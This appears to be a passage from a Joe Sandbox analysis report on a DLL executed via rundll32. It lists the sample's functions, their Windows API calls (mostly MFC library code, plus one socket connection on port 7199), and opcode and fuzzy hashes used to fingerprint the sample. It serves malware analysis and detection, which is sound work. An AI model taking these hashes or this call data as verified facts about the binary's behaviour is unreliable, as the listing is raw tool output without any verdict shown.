                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1509511306-0
                                                                                                                      • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                      • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                      • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                      • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001C7D1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                      • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                        • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                        • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                      • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                      • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                      • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                      • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                        • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                      • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                      • String ID: AfxOldWndProc423
                                                                                                                      • API String ID: 2702501687-1060338832
                                                                                                                      • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                      • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                      • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                      • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10012E90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                      • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                      • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                      • _printf.LIBCMT ref: 10012F79
                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                      • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                      • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                      • API String ID: 4222005279-2156106531
                                                                                                                      • Opcode ID: d6930e6a1fc45b4748102b9b6de5cc36bf5b45ad8e48198316e22918239c4344
                                                                                                                      • Instruction ID: 5c8f7e15fc6d9e06ebf4fa262ac9747ef485c43692dc612ad86c8b01a400670e
                                                                                                                      • Opcode Fuzzy Hash: d6930e6a1fc45b4748102b9b6de5cc36bf5b45ad8e48198316e22918239c4344
                                                                                                                      • Instruction Fuzzy Hash: B6317374A85218DBE724DB90CD56FD9B3B1EF49300F1041E8E509AA2C1DB72E9D18F55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100351B5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                      • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                      • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                      • __lock.LIBCMT ref: 10035229
                                                                                                                      • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                      • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                      • API String ID: 1036688887-2843748187
                                                                                                                      • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                      • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001717E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                      • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                      • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                      • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                      • String ID: MS Shell Dlg
                                                                                                                      • API String ID: 1736106359-76309092
                                                                                                                      • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                      • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                      • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                      • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021ED7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                      • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                      • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                      • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 46613423-3470857405
                                                                                                                      • Opcode ID: 61213e6980dcb3cb65d4e1bccbb3a8eece8a9d69db6aa345a8d68dd3f9e52f8f
                                                                                                                      • Instruction ID: 42bba0fd7f26ad83684da700c29fa1b9b4104b8155991441c2ce65153df76cb7
                                                                                                                      • Opcode Fuzzy Hash: 61213e6980dcb3cb65d4e1bccbb3a8eece8a9d69db6aa345a8d68dd3f9e52f8f
                                                                                                                      • Instruction Fuzzy Hash: A5119175640268EBEB10DBA0DE85FEF77B8EF1A781F800025FA05E6181EB709D05CB65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100209ED Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                      • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                      • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1891723912-0
                                                                                                                      • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                      • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                      • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                      • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10025BA5 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                        • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                        • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                      • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                      • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 317715441-0
                                                                                                                      • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                      • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014A22 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                      • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                        • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                        • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                        • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 168474834-0
                                                                                                                      • Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                      • Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
                                                                                                                      • Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                      • Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10020F2E Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                      • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1151147025-0
                                                                                                                      • Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                      • Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
                                                                                                                      • Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                      • Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001820B Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                      • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                      • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2841959276-0
                                                                                                                      • Opcode ID: 5a69a964b2229b4de645fa0737a3e44a531c48ca18053bc0dcb6ac84ec84f31a
                                                                                                                      • Instruction ID: 14de686d86220a01eaba4d8e7e4af7f56c4348460245bd7539e940c5f7eef93d
                                                                                                                      • Opcode Fuzzy Hash: 5a69a964b2229b4de645fa0737a3e44a531c48ca18053bc0dcb6ac84ec84f31a
                                                                                                                      • Instruction Fuzzy Hash: 99B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10029D32 Relevance: 10.6, APIs: 7, Instructions: 128COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                      • _memset.LIBCMT ref: 10029DA5
                                                                                                                        • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                        • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                        • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2905758408-0
